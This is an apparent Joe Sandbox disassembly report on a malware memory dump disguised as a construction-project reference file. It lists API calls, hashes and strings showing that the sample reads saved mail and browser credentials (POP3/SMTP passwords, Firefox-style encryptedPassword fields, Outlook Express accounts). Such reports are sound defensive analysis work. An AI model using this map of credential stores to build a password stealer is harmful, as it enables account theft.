                                                                                                                          • Source File: 00000006.00000002.2204630217.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000006.00000002.2204630217.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                          • Associated: 00000006.00000002.2204630217.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_6_2_400000_Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: ??3@
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 613200358-0
                                                                                                                          • Opcode ID: 0ad1635ea08d581da3d46e9cfe4a801b3f478eb4f35f0f6f88290fc2b5bda708
                                                                                                                          • Instruction ID: 5841ab7dcc50b440abd9236b7832042a9d7d1d7b8957bb774bcacf87f05c1f29
                                                                                                                          • Opcode Fuzzy Hash: 0ad1635ea08d581da3d46e9cfe4a801b3f478eb4f35f0f6f88290fc2b5bda708
                                                                                                                          • Instruction Fuzzy Hash: AAE046A134974456BA10AF7BAC52F13239CEA803523168C6FB800F36D2EF2CE890846C
                                                                                                                          APIs
                                                                                                                          • ??2@YAPAXI@Z.MSVCRT(00008000,00408DC4,00409CE2,?,?,?,?,?,00000000,74DF0A60), ref: 00408D5C
                                                                                                                          • ??2@YAPAXI@Z.MSVCRT(00000000,00008000,00408DC4,00409CE2,?,?,?,?,?,00000000,74DF0A60), ref: 00408D7A
                                                                                                                          • ??2@YAPAXI@Z.MSVCRT(00000000,00000000,00008000,00408DC4,00409CE2,?,?,?,?,?,00000000,74DF0A60), ref: 00408D98
                                                                                                                          • ??2@YAPAXI@Z.MSVCRT(00000000,00000000,00008000,00408DC4,00409CE2,?,?,?,?,?,00000000,74DF0A60), ref: 00408DA8
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000006.00000002.2204630217.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000006.00000002.2204630217.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                          • Associated: 00000006.00000002.2204630217.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_6_2_400000_Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: ??2@
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 1033339047-0
                                                                                                                          • Opcode ID: 13d41e296071d90ab44a737b93fda326391e3e8b074f3b81c3e25c1d737bd7ac
                                                                                                                          • Instruction ID: b7305a6f8e60e4354fc193aeb8e5872e67636dbc7b7f4d43fc505f02bd19535d
                                                                                                                          • Opcode Fuzzy Hash: 13d41e296071d90ab44a737b93fda326391e3e8b074f3b81c3e25c1d737bd7ac
                                                                                                                          • Instruction Fuzzy Hash: EEF031F05433615EEB559F34ED0672536A4E784302F024B3EE2059A2E6EB78D4908B09
                                                                                                                          APIs
                                                                                                                          • malloc.MSVCRT ref: 00406F4C
                                                                                                                          • memcpy.MSVCRT(00000000,00000000,00000000,00000000,74DF0A60,00407A43,00000001,?,00000000,74DF0A60,00407DBD,00000000,?,?), ref: 00406F64
                                                                                                                          • free.MSVCRT ref: 00406F6D
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000006.00000002.2204630217.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000006.00000002.2204630217.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                          • Associated: 00000006.00000002.2204630217.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_6_2_400000_Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: freemallocmemcpy
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 3056473165-0
                                                                                                                          • Opcode ID: f6360f64df0fef16feaa284e534344f6101794aca07d62af19e0e66fd0e0db42
                                                                                                                          • Instruction ID: 20c18abb4fba39fec419649699297209b7413d51c31022bf8d4f5bc21a778af6
                                                                                                                          • Opcode Fuzzy Hash: f6360f64df0fef16feaa284e534344f6101794aca07d62af19e0e66fd0e0db42
                                                                                                                          • Instruction Fuzzy Hash: 39F0E9726092235FD7089E7AB881D0BB3ADEF94324711482FF445E7281D738EC60C6A8
                                                                                                                          APIs
                                                                                                                            • Part of subcall function 00406FC7: memset.MSVCRT ref: 00406FD1
                                                                                                                            • Part of subcall function 00406FC7: _mbscpy.MSVCRT(?,00000000,?,00000000,0000003C,00000000,?,0040709F,Arial,0000000E,00000000), ref: 00407011
                                                                                                                          • CreateFontIndirectA.GDI32(?), ref: 004070A6
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000006.00000002.2204630217.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000006.00000002.2204630217.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                          • Associated: 00000006.00000002.2204630217.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_6_2_400000_Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: CreateFontIndirect_mbscpymemset
                                                                                                                          • String ID: Arial
                                                                                                                          • API String ID: 3853255127-493054409
                                                                                                                          • Opcode ID: e1a7fbc8e0c3f992e8010e024108b0d146431013d356363f6a3ac0433cd380c2
                                                                                                                          • Instruction ID: 3e85f73e1de40fb669f60d67ce34a2ecc2b5129f84855d11383e820b071861b9
                                                                                                                          • Opcode Fuzzy Hash: e1a7fbc8e0c3f992e8010e024108b0d146431013d356363f6a3ac0433cd380c2
                                                                                                                          • Instruction Fuzzy Hash: FDD0C9A0E4020D67D710F7A0FD47F49776C5B00604F510831B905F10E1EAA4A1184A99
                                                                                                                          APIs
                                                                                                                            • Part of subcall function 00401E69: memset.MSVCRT ref: 00401E8B
                                                                                                                            • Part of subcall function 00401E69: strlen.MSVCRT ref: 00401EA4
                                                                                                                            • Part of subcall function 00401E69: strlen.MSVCRT ref: 00401EB2
                                                                                                                            • Part of subcall function 00401E69: strlen.MSVCRT ref: 00401EF8
                                                                                                                            • Part of subcall function 00401E69: strlen.MSVCRT ref: 00401F06
                                                                                                                          • _strcmpi.MSVCRT ref: 0040CEC3
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000006.00000002.2204630217.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000006.00000002.2204630217.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                          • Associated: 00000006.00000002.2204630217.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_6_2_400000_Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: strlen$_strcmpimemset
                                                                                                                          • String ID: /stext
                                                                                                                          • API String ID: 520177685-3817206916
                                                                                                                          • Opcode ID: 04fdc3cc00142dadabd4a88d380940465e4f92171bf306a3922122064ace388a
                                                                                                                          • Instruction ID: 693fdb5656bfadad22d3d4febeb48e05c11e25f360cf1d4a61822c7fe8fbaaaa
                                                                                                                          • Opcode Fuzzy Hash: 04fdc3cc00142dadabd4a88d380940465e4f92171bf306a3922122064ace388a
                                                                                                                          • Instruction Fuzzy Hash: 5B210C71614112DFC3589B39C8C1966B3A9BF45314B15427FA91AAB392C738EC119BC9
                                                                                                                          APIs
                                                                                                                            • Part of subcall function 00404785: FreeLibrary.KERNELBASE(?,?), ref: 0040479A
                                                                                                                          • LoadLibraryA.KERNELBASE(?,0040F715,?,00000000), ref: 0040473C
                                                                                                                          • GetProcAddress.KERNEL32(00000000,?), ref: 00404754
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000006.00000002.2204630217.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000006.00000002.2204630217.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                          • Associated: 00000006.00000002.2204630217.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_6_2_400000_Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: Library$AddressFreeLoadProc
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 145871493-0
                                                                                                                          • Opcode ID: 368c38512e7cad3fe60d4057cd97a9280d54471de6c65fc2eb8301d482549758
                                                                                                                          • Instruction ID: d196b3276b1a656cda378f5c53e28a4a33de773bbf59b12af1a3f4d2ec041ade
                                                                                                                          • Opcode Fuzzy Hash: 368c38512e7cad3fe60d4057cd97a9280d54471de6c65fc2eb8301d482549758
                                                                                                                          • Instruction Fuzzy Hash: 35F065F8500B039BD7606F34D84879BB3E9AF86310F00453EF961A3281EB38E541CB58
                                                                                                                          APIs
                                                                                                                          • GetPrivateProfileIntA.KERNEL32(?,?,?,?), ref: 00410A92
                                                                                                                            • Part of subcall function 00410983: memset.MSVCRT ref: 004109A1
                                                                                                                            • Part of subcall function 00410983: _itoa.MSVCRT ref: 004109B8
                                                                                                                            • Part of subcall function 00410983: WritePrivateProfileStringA.KERNEL32(?,?,00000000), ref: 004109C7
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000006.00000002.2204630217.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000006.00000002.2204630217.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                          • Associated: 00000006.00000002.2204630217.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_6_2_400000_Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: PrivateProfile$StringWrite_itoamemset
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 4165544737-0
                                                                                                                          • Opcode ID: 0f5553da0f286b85af357dba121878114d67176469d1de62f709c8355ffa0996
                                                                                                                          • Instruction ID: e4187046b5889157fb54d5f6e3f9ccfafaefd38d22cef98a7399574687248963
                                                                                                                          • Opcode Fuzzy Hash: 0f5553da0f286b85af357dba121878114d67176469d1de62f709c8355ffa0996
                                                                                                                          • Instruction Fuzzy Hash: 3DE0B63204020DBFDF125F90EC01AA97B66FF14355F14845AF95804131D37295B0AF94
                                                                                                                          APIs
                                                                                                                          • FreeLibrary.KERNELBASE(?,?), ref: 0040479A
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000006.00000002.2204630217.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000006.00000002.2204630217.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                          • Associated: 00000006.00000002.2204630217.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_6_2_400000_Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: FreeLibrary
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 3664257935-0
                                                                                                                          • Opcode ID: 4a0d43cc5f0709c12baa610e5074795180c2b0919147646b8d68fcb243e336cc
                                                                                                                          • Instruction ID: 8a1fb59f4aee03ee333bbcbb21747f572c22b5e480e1b07aa067c0b07a2bbf9c
                                                                                                                          • Opcode Fuzzy Hash: 4a0d43cc5f0709c12baa610e5074795180c2b0919147646b8d68fcb243e336cc
                                                                                                                          • Instruction Fuzzy Hash: D2D012750013118FD7605F14FC4CBA173E8AF41312F1504B8E990A7196C3389540CA58
                                                                                                                          APIs
                                                                                                                          • CreateFileA.KERNELBASE(?,40000000,00000001,00000000,00000002,00000000,00000000,0040B01C,00000000,00000000,00000000,0044C52F,0044C52F,?,0040CF35,0044C52F), ref: 00406D2C
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000006.00000002.2204630217.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000006.00000002.2204630217.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                          • Associated: 00000006.00000002.2204630217.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_6_2_400000_Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: CreateFile
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 823142352-0
                                                                                                                          • Opcode ID: 426545caef3dd143a0415f2b0fbb8f01fd74bbd6145b7d3b9bbfc6057fee2153
                                                                                                                          • Instruction ID: b62e2d47ef034db7175ca84798afaf0fa2498f7b6fd9cc80310e9c1c0838826b
                                                                                                                          • Opcode Fuzzy Hash: 426545caef3dd143a0415f2b0fbb8f01fd74bbd6145b7d3b9bbfc6057fee2153
                                                                                                                          • Instruction Fuzzy Hash: 59C012F02503007EFF204F10AC4BF37355DE780700F204420BE00E40E2C2A14C008928
                                                                                                                          APIs
                                                                                                                          • FreeLibrary.KERNELBASE(?,00410825,?,?,?,?,?,?,004041C4), ref: 004107FD
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000006.00000002.2204630217.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000006.00000002.2204630217.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                          • Associated: 00000006.00000002.2204630217.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_6_2_400000_Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: FreeLibrary
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 3664257935-0
                                                                                                                          • Opcode ID: 3a17cf7f6aedc8a82690d1348ce7bffc6ab01239e51e6fc2cf21b6a25e88fa5d
                                                                                                                          • Instruction ID: 34cea44665fc180de0fd44d6926484b1362fa2b4776eba2aa4e53c033fc5eded
                                                                                                                          • Opcode Fuzzy Hash: 3a17cf7f6aedc8a82690d1348ce7bffc6ab01239e51e6fc2cf21b6a25e88fa5d
                                                                                                                          • Instruction Fuzzy Hash: 8CC04C355107018BE7219B12C949763B7E4BB00316F54C81894A695454D77CE494CE18
                                                                                                                          APIs
                                                                                                                          • EnumResourceNamesA.KERNEL32(?,?,00410C68,00000000), ref: 00410D02
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000006.00000002.2204630217.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000006.00000002.2204630217.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                          • Associated: 00000006.00000002.2204630217.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_6_2_400000_Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: EnumNamesResource
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 3334572018-0
                                                                                                                          • Opcode ID: b3588a68add1f6d45fd601d09e3ffe49e4267215e4b3f537158054a437bee868
                                                                                                                          • Instruction ID: 5afcab74deb5f1f746bbc86617496166ce7982b7e139a3a4a0d32d3f52cd2e16
                                                                                                                          • Opcode Fuzzy Hash: b3588a68add1f6d45fd601d09e3ffe49e4267215e4b3f537158054a437bee868
                                                                                                                          • Instruction Fuzzy Hash: 05C09B3119534197C7519F108C4DF1B7695BB59706F144D297191940A4D7514054DE05
                                                                                                                          APIs
                                                                                                                          • FindClose.KERNELBASE(?,00407EAA,?,?,00000000,ACD,0044424D,*.oeaccount,ACD,?,00000104), ref: 00407F9A
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000006.00000002.2204630217.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000006.00000002.2204630217.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                          • Associated: 00000006.00000002.2204630217.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_6_2_400000_Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: CloseFind
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 1863332320-0
                                                                                                                          • Opcode ID: 57b8da30fad5a7bddd67670d8939520a2ad49927f904eaf4d9e0c7dde32a44f9
                                                                                                                          • Instruction ID: 6a16c08ea37d16c8a4aa15d9076e95747955e6fceefd1cb8b530e80fb020b3ed
                                                                                                                          • Opcode Fuzzy Hash: 57b8da30fad5a7bddd67670d8939520a2ad49927f904eaf4d9e0c7dde32a44f9
                                                                                                                          • Instruction Fuzzy Hash: 6DC092746165029FD22C5F38ECA942A77A1AF4A7303B80F6CE0F3D20F0E73898528A04
                                                                                                                          APIs
                                                                                                                          • RegOpenKeyExA.KERNELBASE(80000002,80000002,00000000,00020019,80000002,00410E4A,80000002,Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders,00000000,?,?,00000104), ref: 00410AAF
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000006.00000002.2204630217.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000006.00000002.2204630217.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                          • Associated: 00000006.00000002.2204630217.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_6_2_400000_Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: Open
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 71445658-0
                                                                                                                          • Opcode ID: dc2f54250d009d21d03b042bef434314c6075f5cef50a571bf2f69934a328f8c
                                                                                                                          • Instruction ID: dc05f55a30c25c5fac933af4dde5d03becff9f0601af4caa575784a6c8c77920
                                                                                                                          • Opcode Fuzzy Hash: dc2f54250d009d21d03b042bef434314c6075f5cef50a571bf2f69934a328f8c
                                                                                                                          • Instruction Fuzzy Hash: F4C09B35545301FFDE114F40FD45F09BB61AB84B05F004414B244240B182714414EB17
                                                                                                                          APIs
                                                                                                                          • GetFileAttributesA.KERNELBASE(?,00409675,?,0040972B,00000000,?,00000000,00000104,?), ref: 00406F85
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000006.00000002.2204630217.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000006.00000002.2204630217.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                          • Associated: 00000006.00000002.2204630217.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_6_2_400000_Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: AttributesFile
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 3188754299-0
                                                                                                                          • Opcode ID: fa0a746f1e19b68873f4d8ea5d8c23283e8dccdc4d936350afbdeaa92e1ec6ad
                                                                                                                          • Instruction ID: 9c49554ec541f0f53bfa1b31c7f3910b3cb34ca890cc3578c2bd02f8d22bfc28
                                                                                                                          • Opcode Fuzzy Hash: fa0a746f1e19b68873f4d8ea5d8c23283e8dccdc4d936350afbdeaa92e1ec6ad
                                                                                                                          • Instruction Fuzzy Hash: 0CB012B92110004BCB0807349C8904D36505F456317240B3CB033C01F0D720CCA0BE00
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000006.00000002.2204630217.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000006.00000002.2204630217.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                          • Associated: 00000006.00000002.2204630217.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_6_2_400000_Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: PrivateProfileString_mbscmpstrlen
                                                                                                                          • String ID: ESMTPPassword$ESMTPUsername$POP3Password$POP3Server$POP3Username$SMTPServer
                                                                                                                          • API String ID: 3963849919-1658304561
                                                                                                                          • Opcode ID: abaa3120f3dadaa33e6fded1ed61a921173bd62cd5413d2d65547edf030f73d6
                                                                                                                          • Instruction ID: 768c2722c01e59d080de5de3380f4e9b1c28328498c4b4a1784570bb69a0741a
                                                                                                                          • Opcode Fuzzy Hash: abaa3120f3dadaa33e6fded1ed61a921173bd62cd5413d2d65547edf030f73d6
                                                                                                                          • Instruction Fuzzy Hash: B2213371D0111C6ADB61EB51DC82FEE7B7C9B44705F0400EBBA08B2082DBBC6F898E59
                                                                                                                          APIs
                                                                                                                            • Part of subcall function 00406B6D: memset.MSVCRT ref: 00406B8E
                                                                                                                            • Part of subcall function 00406B6D: strlen.MSVCRT ref: 00406B99
                                                                                                                            • Part of subcall function 00406B6D: strlen.MSVCRT ref: 00406BA7
                                                                                                                            • Part of subcall function 00408934: GetFileSize.KERNEL32(00000000,00000000,?,00000000,?,0040F28D,?,00000000,?,?,?,?,?,?), ref: 00408952
                                                                                                                            • Part of subcall function 00408934: CloseHandle.KERNEL32(?,?), ref: 0040899C
                                                                                                                            • Part of subcall function 004089F2: _mbsicmp.MSVCRT ref: 00408A2C
                                                                                                                          • memset.MSVCRT ref: 0040E5B8
                                                                                                                          • memset.MSVCRT ref: 0040E5CD
                                                                                                                          • _mbscpy.MSVCRT(?,?,httpRealm,passwordField,usernameField,encryptedPassword,encryptedUsername,hostname,?,?,?,?,?,0040F28D), ref: 0040E634
                                                                                                                          • _mbscpy.MSVCRT(?,?,httpRealm,passwordField,usernameField,encryptedPassword,encryptedUsername,hostname,?,?,?,?,?,0040F28D), ref: 0040E64A
                                                                                                                          • _mbscpy.MSVCRT(?,00000000,httpRealm,passwordField,usernameField,encryptedPassword,encryptedUsername,hostname,?,?,?,?,?,0040F28D), ref: 0040E660
                                                                                                                          • _mbscpy.MSVCRT(?,00000000,httpRealm,passwordField,usernameField,encryptedPassword,encryptedUsername,hostname,?,?,?,?,?,0040F28D), ref: 0040E676
                                                                                                                          • _mbscpy.MSVCRT(?,00000000,httpRealm,passwordField,usernameField,encryptedPassword,encryptedUsername,hostname,?,?,?,?,?,0040F28D), ref: 0040E68C
                                                                                                                          • _mbscpy.MSVCRT(?,00000000,httpRealm,passwordField,usernameField,encryptedPassword,encryptedUsername,hostname,?,?,?,?,?,0040F28D), ref: 0040E69F
                                                                                                                          • memset.MSVCRT ref: 0040E6B5
                                                                                                                          • memset.MSVCRT ref: 0040E6CC
                                                                                                                            • Part of subcall function 004066A3: memset.MSVCRT ref: 004066C4
                                                                                                                            • Part of subcall function 004066A3: memcmp.MSVCRT(?,00456EA0,00000010,?,?,000000FF), ref: 004066EE
                                                                                                                          • memset.MSVCRT ref: 0040E736
                                                                                                                          • memset.MSVCRT ref: 0040E74F
                                                                                                                          • sprintf.MSVCRT ref: 0040E76D
                                                                                                                          • sprintf.MSVCRT ref: 0040E788
                                                                                                                          • _strcmpi.MSVCRT ref: 0040E79E
                                                                                                                          • _strcmpi.MSVCRT ref: 0040E7B7
                                                                                                                          • _strcmpi.MSVCRT ref: 0040E7D3
                                                                                                                          • memset.MSVCRT ref: 0040E858
                                                                                                                          • sprintf.MSVCRT ref: 0040E873
                                                                                                                          • _strcmpi.MSVCRT ref: 0040E889
                                                                                                                          • _strcmpi.MSVCRT ref: 0040E8A5
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000006.00000002.2204630217.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000006.00000002.2204630217.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                          • Associated: 00000006.00000002.2204630217.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_6_2_400000_Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: memset$_mbscpy$_strcmpi$sprintf$strlen$CloseFileHandleSize_mbsicmpmemcmp
                                                                                                                          • String ID: encryptedPassword$encryptedUsername$hostname$httpRealm$imap://%s$logins$mailbox://%s$passwordField$smtp://%s$usernameField
                                                                                                                          • API String ID: 4171719235-3943159138
                                                                                                                          • Opcode ID: d167a2cf797b5d1909f19c572c007443fa0765fe7e0db263b7bd4f21149122ce
                                                                                                                          • Instruction ID: e6e1aca5762f927b6bef3ecf047b01a22afe4fa283f9592a273acc07610826c1
                                                                                                                          • Opcode Fuzzy Hash: d167a2cf797b5d1909f19c572c007443fa0765fe7e0db263b7bd4f21149122ce
                                                                                                                          • Instruction Fuzzy Hash: D6B152B2D04119AADF10EBA1DC41BDEB7B8EF04318F1444BBF548B7181EB39AA558F58
                                                                                                                          APIs
                                                                                                                          • GetDlgItem.USER32(?,000003E9), ref: 0041042E
                                                                                                                          • GetDlgItem.USER32(?,000003E8), ref: 0041043A
                                                                                                                          • GetWindowLongA.USER32(00000000,000000F0), ref: 00410449
                                                                                                                          • GetWindowLongA.USER32(?,000000F0), ref: 00410455
                                                                                                                          • GetWindowLongA.USER32(00000000,000000EC), ref: 0041045E
                                                                                                                          • GetWindowLongA.USER32(?,000000EC), ref: 0041046A
                                                                                                                          • GetWindowRect.USER32(00000000,?), ref: 0041047C
                                                                                                                          • GetWindowRect.USER32(?,?), ref: 00410487
                                                                                                                          • MapWindowPoints.USER32(00000000,?,?,00000002), ref: 0041049B
                                                                                                                          • MapWindowPoints.USER32(00000000,?,?,00000002), ref: 004104A9
                                                                                                                          • GetDC.USER32 ref: 004104E2
                                                                                                                          • strlen.MSVCRT ref: 00410522
                                                                                                                          • GetTextExtentPoint32A.GDI32(?,00000000,00000000,?), ref: 00410533
                                                                                                                          • ReleaseDC.USER32(?,?), ref: 00410580
                                                                                                                          • sprintf.MSVCRT ref: 00410640
                                                                                                                          • SetWindowTextA.USER32(?,?), ref: 00410654
                                                                                                                          • SetWindowTextA.USER32(?,00000000), ref: 00410672
                                                                                                                          • GetDlgItem.USER32(?,00000001), ref: 004106A8
                                                                                                                          • GetWindowRect.USER32(00000000,?), ref: 004106B8
                                                                                                                          • MapWindowPoints.USER32(00000000,?,?,00000002), ref: 004106C6
                                                                                                                          • GetClientRect.USER32(?,?), ref: 004106DD
                                                                                                                          • GetWindowRect.USER32(?,?), ref: 004106E7
                                                                                                                          • SetWindowPos.USER32(?,00000000,00000000,00000000,?,?,00000206), ref: 0041072D
                                                                                                                          • GetClientRect.USER32(?,?), ref: 00410737
                                                                                                                          • SetWindowPos.USER32(?,00000000,?,?,?,?,00000204), ref: 0041076F
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000006.00000002.2204630217.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000006.00000002.2204630217.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                          • Associated: 00000006.00000002.2204630217.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_6_2_400000_Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: Window$Rect$Long$ItemPointsText$Client$ExtentPoint32Releasesprintfstrlen
                                                                                                                          • String ID: %s:$EDIT$STATIC
                                                                                                                          • API String ID: 1703216249-3046471546
                                                                                                                          • Opcode ID: c45e47aa9121f830d125028a7f876627aec3aac4030610de851cfdb352c947b7
